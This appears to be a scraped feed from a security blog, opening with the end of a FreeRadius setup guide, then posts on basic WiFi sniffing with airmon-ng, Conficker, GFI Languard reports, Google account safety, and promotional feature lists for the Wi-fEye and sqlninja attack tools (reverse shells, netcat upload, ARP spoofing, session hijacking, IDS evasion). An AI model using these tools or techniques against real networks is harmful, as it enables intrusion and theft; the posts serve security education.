Extract the phpMyPrepaid file to a directory on your webserver eg /var/www/html/myprepaid
Create a MySQL database called radius and create a user and password for it. Use a script called db_mysql.db that you will find in the phpMyPrepaid download to create the database tables.
Edit the dbconnect.php file in the phpMyPrepaid directory and enter the username and password for your MySQL radius database. IMPORTANT Save this file behind your web directory or your passwords will be easy to hack.
Edit config.inc.php and change the line that points to dbconnect to wherever you have saved dbconnect.php
In your web browser got to http://yoursite.com/whereveryouputphpmyprepaid/ and create some tickets. Check your database to see if the users have been setup in radcheck. Launch FreeRadius as root with this command radiusd -xxyx -l stdout. Pick a user and password from your database and try to login from a wireless client. If you can then it is time for step 5. If not go back to step 1 and check everything.

Step 5 : Have a cup of coffee and unwind. If all is well you have finished. I'll keep an eye on this post and do my best to help anyone with problems.
I have setup a free Radius test area for people that have no access to a Radius server. You can use this service to test your Chillispot configuration. The address is http://swarmhotspots.com/Chilli-Test-Area
Source:Howtoforge.com

WiFi Hacking Basics Part 1

noreply@blogger.com (Rahul Sachin Amey) — Sun, 15 May 2011 17:10:00 +0000

If your are reading this you must have used WiFi atleast once or may be you have your own WiFi network at home.Wifi is cool and hacking wifi is a lot more interesting.Here i am gonna tell you the basics of Wireless Network and how it is hacked so that you get a grasp of what is going on with your Wifi.
I am using a informal term for Wireless Network as Wifi because its more familiar to public.My aim would be to show how Wifi is hacked.You can try yourself this attacks for this
What will you need ,

Laptop with Backtrack installed or Backtrack in VM
Access Point(AP)
USB WiFi Adapter Card which support packet injection(I recommend Alpha Card)
A Smartphone or another laptop with Wifi (as a Victim)

For those who don't know Backtrack,its a Pentest Linux Distro with all tools necessary.Access point can be any SOHO wifi router.USB Wifi Adapter is for packet injection because normal Laptop wifi card chiset don't support Packet Injection.
So lets get started with basics or theory.
Normally your wifi card sniff all wireless network around it but only accepts packets destined to it if its connected to it at all. AP (Access Point) is broadcasting networks SSIDs all the time.SSID means name given to wireless network.This network can be open or closed.Open network don't require any authentication on the other hand closed network require a shared key to connect to it.More on closed network in later posts.
So how to sniff which which network are there?
For this we use a tool in Backtrack called Aircrack-ng suite.To sniff the packets we create a virtual interface called Moniter Mode Interface (mon 0).Mon 0 is created on top wireless interface on your laptop,say wlan 0.
First task would be to create Mon 0.
Goto backtrack open terminal type airmon-ng start wlan0
now mon0 is created, to verify it type in terminal ifconfig you will notice mon0 interface and MAC address same as your wifi card.
Now there is another tool we are going to use to see actual packets Wireshark.Next step fire up Wireshark by typing wireshark & on terminal.You will see in interface mon0 listed start capture on mon0.

then you will see lots of packets if there is any wifi connection in your vicinity,if you dont see any traffic create a network using your AP and check the SSIDs.
What we learned : How to create mon0 and sniff traffic.
Contd.. part 2

Iran is getting paranoid over new cyber-attack 'Stars'

noreply@blogger.com (Rahul Sachin Amey) — Tue, 26 Apr 2011 05:51:00 +0000

After discovering an attack on its SCADA systems willing to take down their nuclear facility, Iran is probably getting paranoid over the whole malware cosmos. It seems that every other abnormal behavior on Iran's critical facility is viewed by them as an attack or a threat to their nuclear reactors. Yesterday Iran's Mehr News Agency reported that the country is under a new kind of cyber attack after Stuxnet, know as 'Stars'. Iran does not yet have complete information what adverse effects of this new so called 'Cyber Attack' is having on its systems.

Excerpts from Mehr's report:

“(However), certain characteristics about the Stars worm have been identified, including that it is compatible with the (targeted) system and that the damage is very slight in the initial stage, and it is likely to be mistaken for executable files of the government,” Senior Iranian lawmaker Jalali stated.

It is not very sure from the official's statement, which operating system is being targeted by Stars. We have to wait for any official announcements from Iran's cyber experts before we or they reach a conclusion of Stars being a reality or is it just a hoax arising out of concern.

Elsewhere in his remarks, Jalali said that although the United States and Israel have flouted international law in their cyber attacks against Iran, this matter can still be pursued through legal channels. He also stated that Siemens, the supplier of SCADA systems used by Iran's facilities, should be held responsible for Stuxnet.

Well Siemens might not be fully responsible, but partially yes. How can one even think of using an OS like Windows which is constantly under new attacks, no matter which AV you install on it, for administration of such critical systems. Windows is liked by all for its user-friendliness and as a way of attracting more clients Siemens had introduced Windows compatible application for administration of its SCADA systems which had a drastic consequence as it was targeted by Stuxnet.

It is indeed "A Little World"

noreply@blogger.com (Rahul Sachin Amey) — Fri, 11 Mar 2011 18:14:00 +0000

I would like to share my views or rather I should say my feelings for a beautiful technology I have encountered lately. What is Information Technology? This question always irritated me in college although I was doing my engineering from the same stream. To this question, the answer that I found, according to my view is: "Information Technology is the APPLICATION of computer systems or computer science in various fields". Application- Yes, that's the word. It is not the sophistication of the technology that matters, it is its application. A few months earlier I had posted about the Sixth Sense Technology. Almost an year after Sixth Sense, this is something that really moved me.

Well not wasting much of your time, I should come straight to the point. It is about an organization I visited a week back. The name of the organization is exactly how I am feeling while writing this - It is indeed "A Little World" . I'll try to explain here how it functions.

The objective of the organization is to expand banking services to the remote villages of India where the average daily income of a person is not more than a few hundred rupees. In finance terms, it is called "Financial Inclusion". Here's how they work:-

First, ALW("A Little World") gets into an agreement with some bank which allows ALW to open accounts and provide a way for transacting funds to the remote villagers.

Once into an agreement, ALW appoints willing representatives from remote villages who are given a self-employment opportunity. These representatives are called "Customer Service Points" or "Customer Service Providers"(ALW, correct me if I am wrong). These CSPs are provided a CSP kit which contains a Nokia Mobile Phone with a Camera and NFC and bluetooth technology and a fingerprint reading and receipt printing equipment.

Now if a villager wants to open an account with the CSP, he approaches the CSP for the same. The joining customer fills up a form and chooses to one of the following forms of identification means:
1. The Joining Form itself
2. A ID card bearing a Barcode or
3. An NFC which stores all customer data in eletronic format

After filling the form, as a means of authentication, fingerprints of six different fingers are scanned and stored in the customer database using the equipment(:( My bank does not provide Biometric authentication ). Finally a picture of the customer is taken using the provided mobile phone. All this data is then transferred over GPRS immediately or at the end of the day to ALW customer database, which is then used to create an account with the bank.

The bank then provides ALW with the account numbers of the enrolled accounts. ALW then creates the identification means for the customer i.e. Barcode Card or NFC card which are sent to the corresponding CSP for the customer.

This was about enrollment. Now let us see how a transaction takes place. The minimum transaction amount for customers with ALW is Rs. 10 and maximum is Rs. 10000. Not too small, not too large for a villager. We are going look at the transaction with NFC card(It is very interesting). If a farmer needs to deposit Rs. 100 to his account, he visits the CSP with his card. To identify the customer, CSP uses the phone which has a custom built application to read the data from the NFC card. The card is read by placing it close to the mobile phone. Once the customer is identified, CSP enters the amount to be deposited, accepts the payment and prints the receipt from the equipment. The communication between the equipment and mobile phone is done over Bluetooth.

While withdrawing an amount, Biometric authentication is done. ALW has constant communication with the bank it holds account to sync the transactions. What less does the CSP provide than a bank branch? Safe, Secure and easily accessible banking is all that we require and yes, ALW is providing it. When a demonstration of this was given to me, it really moved me. It was then when I felt the name of the organization really suits its purpose.

I wish "A Little World" all the very best for their future plans and hope that RBI also blesses them with decent subsidies for their betterment.

How to combine multiple GFI scans into a single report

noreply@blogger.com (Rahul Sachin Amey) — Fri, 17 Dec 2010 07:04:00 +0000

One of TechKranti's regular readers Vinesh Redkar from Mumbai, India requested us to solve a problem he was facing while using GFI Languard. Here's what his query is:

"My compoany has recently bought GFI Languard for scanning the network for vulnerabilities and missing patches. I scanned 25 computers in my office network individually each time entering the credentials for the respective machine. Now I need a statistical report mentioning the percentage of High security vulnerabilities, missing patches and so on. How can I combine the results so that all of them depict one single scan."

Hey Vinesh, we are happy you raised this query. We are glad to attend to it. Here's the solution to your problem-
First of all, for those who have not used GFI Languard ever, lemme tell you that GFI Languard is not any usual port scanning software like nmap. GFI is mostly liked by security admins as it is the perfect tool for performing a security audit of a network without actually having to hire a security consultant. GFI is actually a proprietary tool, but it's trial version is available.

So while scanning a machine using GFI Languard, you need to enter the administrator credentials for that machine as it facilitates the tool to go deep inside the OS to find missing patches and vulnerabilities. It also detects unsecured settings configured on the system, status of your antivirus software and application vulnerabilities too.

You can save GFI scans in XML format. This is the format which will help us combining the results to one aggregate. If you have not saved the scans in XML format after scanning, you can still do it by loading the scan form GFI database(Ctrl+O) and then doing a save operation(Ctrl+S). Following is the structure of a GFI XML result.

<Scan>
<hosts>
<host>
</host>
</hosts>
</Scan>

There are many more nodes within the host node, but we are not interested in it. GFI Languard is there to interpret it for us. So each Scan root node has a hosts child node node, which has many host child nodes. The host node contains all the information about the scan for a specific host. If you understood this all you need is simply a copy and paste job. Well you can edit these XML files using notepad.

Make a copy of any XML result file in which you will be saving the final result. This is your master file. Now find the </host> tag in the file. This is the end of your result for one particular host. If the master file you have selected contains multiple hosts, find the last occurrence of </host> tag. Now open the other scans one by one which you want to integrate in the final result. Copy the text from <host> to </host> which actually contains the result of your scan and paste it after the last occurrence of </host> tag in the master file. Do this for all the individual scans and save the master file. You can open the saved master file in Firefox to confirm if it's error free. You think it's done?? Well, almost.

Here's the catch. Even after doing this when you open the final result in GFI on the same PC from which you had run the scans it will only show the scans that were originally present in our master file. If it has ever happened to you, and you have been wondering why doesn't it work here's the solution.

GFI languard stores all it's scan results in one MS Access database file(.mdb) It is less time consuming for GFI to extract the scan results from the Access file than it is to extract it from an XML file. To lower the computation required while loading an XML scan result, GFI keeps track of scans using a session ID. This session id can be found in the attributes of the <Scan> root node. Here's what it looks like(highlighted):

<Scan UIScan="" Session="145244609" Profile="Full Scan" CreatedOn="11/26/2010 02:52:46 PM" ReadOnly="0" ScansEnded=" 1" profilesenabled=" 1" ScanDuration=" 61" ScheduledScan=" 0" ScannedItemsCount=" 1642" AutoremediationEnabled_MissingPatches=" 0" AutoremediationEnabled_MissingServicePacks=" 0" AutoremediationEnabled_UninstallApplications=" 0">

When you create the master file and paste all the scans into the XML file and try to load the file, GFI first looks for the Session attribute, to determine if the scan exists in its database. So the solution to your problem is simple. Just change the Session attribute to anything you like and you are done. GFI will treat this as one single scan, and you can create aggregated reports for presenting to your management.

I hope that solves your problem Vinesh. Keep writing in. We would be glad to address your problems. Hey readers, if you too are looking for solutions to some problems feels free to post your queries to amey [at] techkranti [dot] com and we would be happy to help you.

Get Security Tips n Tricks on your mobile.

Subscribe to TechKranti's SMS channel

Subscribe to TechKranti's feeds

Nuisance of the Conficker Worm

noreply@blogger.com (Rahul Sachin Amey) — Sun, 12 Dec 2010 11:03:00 +0000

An year back, we had posted about the nuisance of the Conficker Worm in THIS POST. An year later, my colleague Mr. Gaurav Benjamin had a live experience with the havoc Conficker can create. Here is his experience in his own words:

"Hello Everybody,

Just wanted to update you with an Issue which happened at Client site and how was it remediated.

Issue: Domain user accounts getting locked out automatically. When users would lock their terminals and go out for break after coming back their accounts were disabled automatically.

Investigations Done:

1. Checking of domain controller policies for any inconsistencies.

2. Checking of presence of any virus by their antivirus. (McAfee) Result: Nothing was found. (Was not updated)

3. Systems & Server were not patched regularly with Latest patches.

4. Checking of security logs on Server. Result: No information was found.

Client Environment Information:

User Desktops: Windows 7

Server: Windows 2008

Alternative Solutions Recommended:

1. Installing of free ware of AVG and run SCAN on affected machines.

2. Installing Nessus and scan the network for any vulnerabilities.

Issues Found: Detection of virus named “Conficker.B” .

Summary on Functioning of Virus:

Conficker primarily spreads through a Windows Vulnerability (MS08-067), which if un patched allows the worm to attack the Windows file sharing service. Conficker is a type of computer virus called a computer worm. Computer worms take advantage of un patched computer systems to automatically spread themselves.

Once a computer is infected, the infected system begins to scan the Internet, or its local network for un patched computers to infect.

Capabilities of this Virus:

1. Even if you have a backup service in case you get hit by a virus, Conficker Virus instantly disables this backup service so you will definitely be left with nothing.

2. Conficker Virus will also not allow you to enter security websites.

3. It will erase all your recently saved important and official documents.

4. Conficker Virus will also not give you access to security sites and services.

5. It will make your computer vulnerable to infected machines making you get more programs from the malware's creator.

Conficker virus comes in below mentioned versions:

* Win32/Conficker.A was reported to Microsoft on November 21, 2008.

* Win32/Conficker.B was reported to Microsoft on December 29, 2008.

* Win32/Conficker.C was reported to Microsoft on February 20, 2009.

* Win32/Conficker.D was reported to Microsoft on March 4, 2009.

* Win32/Conficker.E was reported to Microsoft on April 8, 2009.

Win32/Conficker.B might spread through file sharing and via removable drives, such as USB drives (also known as thumb drives). The worm adds a file to the removable drive so that when the drive is used, the AutoPlay dialog box will show one additional option.

The Conficker worm can also disable important services on your computer. In the screenshot of the Auto play dialog box below, the option Open folder to view files — Publisher not specified was added by the worm. The highlighted option — Open folder to view files — using Windows Explorer is the option that Windows provides and the option you should use.

If you select the first option, the worm executes and can begin to spread itself to other computers.

The option Open folder to view files — Publisher not specified was added by the worm.

Illustration of working :

Quick Remedies and Information for such Situations:

1. If your computer is infected with the Conficker worm, you may be unable to download certain security products, such as the Microsoft Malicious Software Removal Tool or you may be unable to access certain Web sites, such as Microsoft Update. If you can't access those tools, try using the Windows Live safety scanner.

2. Alternatively you can also try downloading AVG Antivirus and scan the machines.

3. Also you might want to update the antivirus at client site with latest information. And also the patches on desktops & servers to the latest ones.

4. Scan your Computers with Both Anti-Virus and Anti-Spyware software.

We thank Gaurav for sharing his valuable experience with us and expect to receive many such articles from other people reading this post too.

If you've got to say something on Ethical Hacking or Information Security mail us your articles at amey [at] techkranti [dot] com and we'll publish them for you.

Wi-fEye - An automated network penetration testing tool

noreply@blogger.com (Rahul Sachin Amey) — Mon, 15 Nov 2010 09:30:00 +0000

Wi-fEye is designed to help with network penetration testing, Wi-fEye will allow you to perform a number of powerful attacks Automatically, all you have to do is to lunch Wi-fEye, choose which attack to perform, select your target and let Wi-fEye do the magic !!

Wi-fEye is divided to four main menus:
1. Cracking menu: This menu will allow you to:

Enable monitor mode
View avalale Wireless Networks
Launch Airodump-ng on a specific AP
WEP cracking: this will allow you to perform the following
attacks automatically:
Interactive packet replay.
Fake Authentication Attack.
Korek Chopchop Attack.
Fragmentation Attack.
Hirte Attack (cfrag attack).
Wesside-ng.
WPA Cracking: This contains the following attacks:
Wordlist Attack
Rouge AP Attack.

2. Mapping: this menu will allow you to do the following:

Scan the network and view the connected hosts.
Use Nmap Automatically.

3. MITM: this menu will allow you to do the following Automatically:

Enable IP forwarding.
ARP Spoof.
Launch ettercap (Text mode).
Sniff SSL/HTTPS traffic.
Sniff URLs and send them to browser.
Sniff messengers from instant messengers.
Sniff images.
DNS Spoof.
HTTP Session Hijacking (using Hamster).

4. Others: this menu will allow you to o the following automatically:

Change MAC Address.
Hijack software updates (using Evilgrade).

Official Website: http://wi-feye.za1d.com/t
Download page: http://wi-feye.za1d.com/Download.html

Get Updates for Hacking Tools on your mobile.

Subscribe to TechKranti's SMS channel

Subscribe to TechKranti's feeds

SQLninja - An SQL Server injection & takeover tool

noreply@blogger.com (Rahul Sachin Amey) — Mon, 15 Nov 2010 09:01:00 +0000

Fancy going from a SQL Injection on Microsoft SQL Server to a full GUI access on the DB? Take a few new SQL Injection tricks, add a couple of remote shots in the registry to disable Data Execution Prevention, mix with a little Perl that automatically generates a debug script, put all this in a shaker with a Metasploit wrapper, shake well and you have just one of the attack modules of sqlninja!
Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end.
Its main goal is to provide a remote access on the vulnerable DB server, even in a very hostile environment. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered.

Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, DB authentication mode)
Bruteforce of 'sa' password (in 2 flavors: dictionary-based and incremental)
Privilege escalation to sysadmin group if 'sa' password has been found
Creation of a custom xp_cmdshell if the original one has been removed
Upload of netcat (or any other executable) using only normal HTTP requests (no FTP/TFTP needed)
TCP/UDP portscan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell
Direct and reverse bindshell, both TCP and UDP
DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for a direct/reverse shell, but the DB server can resolve external hostnames (check the documentation for details about how this works)
Evasion techniques to confuse a few IDS/IPS/WAF
Integration with Metasploit3, to obtain a graphical access to the remote DB server through a VNC server injection
Integration with churrasco.exe, to escalate privileges to SYSTEM on w2k3 via token kidnapping

Platforms supported

Sqlninja is written in Perl and should run
on any UNIX based platform with a Perl interpreter, as long as all
needed modules have been installed. So far it has been successfully
tested on:

Linux
FreeBSD
Mac OS X

Download Page: http://sqlninja.sourceforge.net/

Get Security News on your mobile.

Subscribe to TechKranti's SMS channel

Subscribe to TechKranti's feeds

Protect your data in the cloud says Priya Nayak, Consumer Operations, Google Accounts

noreply@blogger.com (Rahul Sachin Amey) — Mon, 18 Oct 2010 11:56:00 +0000

Like many people, you probably store a lot of important information in your Google Account. I personally check my Gmail account every day (sometimes several times a day) and rely on having access to my mail and contacts wherever I go. Aside from Gmail, my Google Account is tied to lots of other services that help me manage my life and interests: photos, documents, blogs, calendars, and more. That is to say, my Google Account is very valuable to me.

Unfortunately, a Google Account is also valuable in the eyes of spammers and other people looking to do harm. It’s not so much about your specific account, but rather the fact that your friends and family see your Google Account as trustworthy. A perfect example is the “Mugged in London” phishing scam that aims to trick your contacts into wiring money — ostensibly to help you out. If your account is compromised and used to send these messages, your well-meaning friends may find themselves out a chunk of change. If you have sensitive information in your account, it may also be at risk of improper access.

As part of National Cyber Security Awareness month, we want to let you know what you can do to better protect your Google Account.
Stay one step ahead of the bad guys

Account hijackers prey on the bad habits of the average Internet user. Understanding common hijacking techniques and using better security practices will help you stay one step ahead of them.

The most common ways hijackers can get access to your Google password are:
* Password re-use: You sign up for an account on a third-party site with your Google username and password. If that site is hacked and your sign-in information is discovered, the hijacker has easy access to your Google Account.
* Malware: You use a computer with infected software that is designed to steal your passwords as you type (“keylogging”) or grab them from your browser’s cache data.
* Phishing: You respond to a website, email, or phone call that claims to come from a legitimate organization and asks for your username and password.
* Brute force: You use a password that’s easy to guess, like your first or last name plus your birth date (“Laura1968”), or you provide an answer to a secret question that’s common and therefore easy to guess, like “pizza” for “What is your favorite food?”

As you can see, hijackers have many tactics for stealing your password, and it’s important to be aware of all of them.
Take control of your account security across the web
Online accounts that share passwords are like a line of dominoes: When one falls, it doesn’t take much for the others to fall, too. This is why you should choose unique passwords for important accounts like Gmail (your Google Account), your bank, commerce sites, and social networking sites. We’re also working on technology that adds another layer of protection beyond your password to make your Google Account significantly more secure.
Choosing a unique password is not enough to secure your Google Account against every possible threat. That’s why we’ve created an easy-to-use checklist to help you secure your computer, browser, Gmail, and Google Account. We encourage you to go through the entire checklist, but want to highlight these tips:

* Never re-use passwords for your important accounts like online banking, email, social networking, and commerce.

* Change your password periodically, and be sure to do so for important accounts whenever you suspect one of them may have been at risk. Don’t just change your password by a few letters or numbers (“Aquarius5” to “Aquarius6”); change the combination of letters and numbers to something unique each time.

* Never respond to messages, non-Google websites, or phone calls asking for your Google username or password; a legitimate organization will not ask you for this type of information. Report these messages to us so we can take action. If you responded and can no longer access your account, visit our account recovery page.

We hope you’ll take action to ensure your security across the web, not just on Google. Run regular virus scans, don’t re-use your passwords, and keep your software and account recovery information up to date. These simple yet powerful steps can make a difference when it really counts.
SOURCE: Google Online Security Blog